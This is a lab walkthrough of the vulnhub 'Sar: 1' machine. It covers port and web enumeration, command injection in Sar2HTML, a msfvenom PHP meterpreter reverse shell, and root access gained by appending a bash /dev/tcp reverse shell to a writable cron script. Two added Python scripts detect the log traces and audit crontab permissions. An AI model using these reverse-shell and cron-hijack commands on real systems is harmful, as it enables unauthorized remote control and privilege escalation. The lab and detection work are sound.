# Sar: 1

This real-life-like VM from [**vulnhub.com**](https://www.vulnhub.com/entry/sar-1,425/) is good practice for OSCP. I found the privilege escalation part the most challenging. But this is a good practice VM, and I hope this write-up will help readers.

![](/files/-M_-cc0JKXw09tx_4YYk)

### Enumeration:

1\) Host discovery: **`netdiscover -i eth0 -r 10.0.0.0/16`** (Found IP: 10.0.2.46)

2\) nmap all-port scan: **`nmap -p- -Pn -v -T5 10.0.2.46`**

```
PORT   STATE SERVICE
80/tcp open  http
```

3\) All-port scan using masscan: **`masscan -p1-65535 10.0.2.46 --rate=1000 -e eth0`**

* **`-p1-65535`** tells masscan to scan all TCP ports (**`-p1-65535,U:1-65535`** would additionally cover all UDP ports)
* **`--rate=1000`** sets the scan rate to 1000 packets per second
* **`-e eth0`** tells masscan to send probes and listen for responses on the network interface eth0

This also shows only one open port.

4\) enum4linux shows nothing: **`enum4linux -v -a 10.0.2.46`**

5\) Port 80 shows the default Ubuntu page:

![](/files/-M_-QRPghIiDiPSSWcaR)

6\) Directory brute-forcing of the website (found nothing interesting):

**`gobuster dir -u http://10.0.2.46/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`**

```
===============================================================
/server-status        (Status: 403) [Size: 274]
```

7\) Nikto scan: **`nikto -h http://10.0.2.46`** (here it shows some interesting info)

```
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
```

8\) /phpinfo.php shows:

![](/files/-M_-_0Zs42qVxBp9O5mc)

9\) /robots.txt

![](/files/-M_-_WigXl6I8JYWo3co)

10\) There is a report upload option on this /sar2HTML page:

![](/files/-M_-as17aWzHrlpzGhat)

11\) Found an exploit for Sar2HTML: [exploit-db](https://www.exploit-db.com/exploits/47204). It says I can run commands through the URL.

![](/files/-M_0EagOkXOsqxtBNmpr)

### Exploitation:

12\) As commands are executed via the URL, I can execute a reverse shell. I created a shell from [revshells.com](https://www.revshells.com/) and tried to execute it, but it failed.

13\) Creating a payload using msfvenom and uploading it:

**`msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.2.42 lport=9999 -f raw > sar.php`**

14\) From the earlier **`;ls`** command, I found that there is a /uPLOAD directory. So to execute the shell, I need to visit **/sar2HTML/sarDATA/uPLOAD/sar.php**

15\) Metasploit handler:

```
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.2.42
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run
```

Visiting the sar.php file will give a reverse connection.
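From the defender's side, the two things that happened in steps 11 to 15 both leave traces in the Apache access log: a query-string value carrying shell metacharacters (the `;ls` style injection), and a request for a PHP file inside the application's upload directory. The following Python script is an added example, not code from the original write-up or from Sar2HTML; it parses Apache combined-format log lines and flags both patterns. The log lines, the timestamps and the query parameter name `report` are constructed for the example (the write-up does not name the vulnerable parameter); only the upload path comes from the write-up.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines in Apache combined log format; parameter name `report` is hypothetical.
SAMPLE_LOG = """\
10.0.2.42 - - [12/Jan/2021:10:01:12 +0000] "GET /sar2HTML/index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.2.42 - - [12/Jan/2021:10:01:30 +0000] "GET /sar2HTML/index.php?report=;ls HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.2.42 - - [12/Jan/2021:10:02:05 +0000] "GET /sar2HTML/index.php?report=%3Bid HTTP/1.1" 200 2190 "-" "Mozilla/5.0"
10.0.2.42 - - [12/Jan/2021:10:03:44 +0000] "GET /sar2HTML/sarDATA/uPLOAD/sar.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.2.42 - - [12/Jan/2021:10:04:01 +0000] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that end or chain a shell command; their presence in user input is a red flag.
SHELL_META = re.compile(r'[;|`&]|\$\(')

# Upload directory from the write-up; extend this tuple for other applications.
UPLOAD_DIRS = ("/sar2HTML/sarDATA/uPLOAD/",)
SCRIPT_EXTS = (".php", ".phtml", ".phar")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_findings(target):
    """(name, decoded value) pairs of query parameters that contain shell metacharacters."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decoded once; this catches a second encoding layer
        if SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits


def upload_exec_finding(target):
    """True when a server-side script is requested from inside an upload directory."""
    path = urlsplit(target).path.lower()
    return any(path.startswith(d.lower()) for d in UPLOAD_DIRS) and path.endswith(SCRIPT_EXTS)


def scan_log(text):
    """Run both detections over every parsable line and return the findings in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for name, value in query_findings(rec["target"]):
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "kind": "shell-meta-in-query", "detail": f"{name}={value!r}"})
        if upload_exec_finding(rec["target"]):
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "kind": "script-exec-from-upload-dir",
                             "detail": urlsplit(rec["target"]).path})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind']}: {f['detail']}")
```

The second detection is the more durable one: whatever the injection looks like, a web server that executes PHP from a directory it also accepts uploads into is the misconfiguration that turned command execution into a persistent shell here. Serving that directory with PHP handling disabled (or outside the document root) removes the step entirely.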

16\) After searching for a while, I found user.txt. The locate/find commands do not work here.

![](/files/-M_-pyb3xEz6AUq1OuNq)

### Privilege escalation:

17\) In the meterpreter session I cannot execute a Python shell directly, so I have to run `shell` first and then: **`python3 -c 'import pty;pty.spawn("/bin/bash")'`**

18\) Using [LinEnum](https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/) to automate the enumeration. Some good places to download and run LinEnum are:

* /tmp
* /dev/shm
* /var/lock
* /run/lock

This produces a huge report, but not a very useful one.

19\) Found cron jobs: **`cat /etc/crontab`**

```
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
```

20\) Inside *finally.sh* it runs *write.sh*, and I can edit **write.sh**, so I added a reverse shell there:

**`echo "/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.42/4444 0>&1' " >> write.sh`**

After waiting for 5 minutes, I got a root shell on my other netcat listener. Changing to the root directory, I found root.txt.

![](/files/-M_0CTW3VGduJgAGFy2m)
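The root cause in steps 19 and 20 is a root cron entry whose script chain ends in a file a low-privileged user can write. That is easy to audit for. The script below is an added example, not part of the write-up or of any tool it uses: it parses `/etc/crontab` entries, follows each root-run command to the script it executes (resolving a leading `cd <dir> &&`, as in the entry above), looks one level deeper into that script for other scripts it calls, and reports any that are not root-owned, are group- or world-writable, or sit in a world-writable directory. The crontab text is the one from the write-up; because `/var/www/html` is not available here, `demo()` rebuilds the `finally.sh` to `write.sh` layout in a temporary directory with write.sh deliberately mode 0777.

```python
import os
import re
import stat
import tempfile
from collections import namedtuple

# Crontab from the write-up, embedded as sample input (the first entries contain no script paths).
SAMPLE_CRONTAB = """\
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
"""

SCRIPT_EXTS = (".sh", ".py", ".pl")
Finding = namedtuple("Finding", "user command path reasons")


def parse_system_crontab(text):
    """Yield (user, command) for each active entry in /etc/crontab format."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue                      # comment or environment assignment (SHELL=, PATH=)
        if line.startswith("@"):          # @reboot / @daily form: shortcut user command
            fields = line.split(None, 2)
        else:                             # m h dom mon dow user command
            fields = line.split(None, 6)
        if len(fields) == (3 if line.startswith("@") else 7):
            yield fields[-2], fields[-1]


def script_paths(command, cwd="/"):
    """Script files a shell command line would execute, resolved against a leading `cd <dir> &&`."""
    m = re.match(r"\s*cd\s+(\S+)\s*&&", command)
    if m:
        cwd = m.group(1)
    found = []
    for tok in re.split(r"[\s;&|()]+", command):
        if tok.endswith(SCRIPT_EXTS):
            found.append(os.path.normpath(tok if tok.startswith("/") else os.path.join(cwd, tok)))
    return found


def referenced_scripts(path):
    """One level deeper: scripts invoked from inside `path` (relative names resolved to its directory)."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return []
    base = os.path.dirname(path)
    return [p for line in lines if not line.lstrip().startswith("#") for p in script_paths(line, base)]


def weak_permissions(path):
    """Reasons a root-executed script at `path` could be modified by an unprivileged user."""
    reasons = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        reasons.append("missing: a writable parent directory would let anyone create it")
    else:
        if st.st_uid != 0:
            reasons.append(f"not owned by root (uid {st.st_uid})")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group- or world-writable")
    try:
        parent = os.stat(os.path.dirname(path) or "/")
        if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
            reasons.append("parent directory world-writable without sticky bit")
    except OSError:
        pass
    return reasons


def audit_crontab(text, follow=True):
    """Flag root (or sudo-using) cron entries whose script, or a script it calls, is weakly protected."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root" and not re.search(r"\bsudo\b", command):
            continue
        targets = script_paths(command)
        if follow:
            for p in list(targets):
                targets.extend(referenced_scripts(p))
        for p in dict.fromkeys(targets):      # de-duplicate while keeping order
            reasons = weak_permissions(p)
            if reasons:
                findings.append(Finding(user, command, p, reasons))
    return findings


def demo():
    """Recreate the write-up's layout in a temp dir: finally.sh (0755) runs write.sh (0777)."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "finally.sh"), "w") as fh:
            fh.write("#!/bin/bash\n./write.sh\n")
        with open(os.path.join(d, "write.sh"), "w") as fh:
            fh.write("#!/bin/bash\necho tick\n")
        os.chmod(os.path.join(d, "finally.sh"), 0o755)
        os.chmod(os.path.join(d, "write.sh"), 0o777)
        return audit_crontab(SAMPLE_CRONTAB.replace("/var/www/html/", d + "/"))


if __name__ == "__main__":
    for f in demo():
        print(f"[{f.user}] {f.command}\n    -> {f.path}: {', '.join(f.reasons)}")
```

Run against a real host, `audit_crontab(open("/etc/crontab").read())` is the call; the same parser works on the files in `/etc/cron.d/`. The one-level follow is deliberate: `finally.sh` itself was fine here, and only its callee was writable, which is exactly the case a check that stops at the crontab entry misses.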

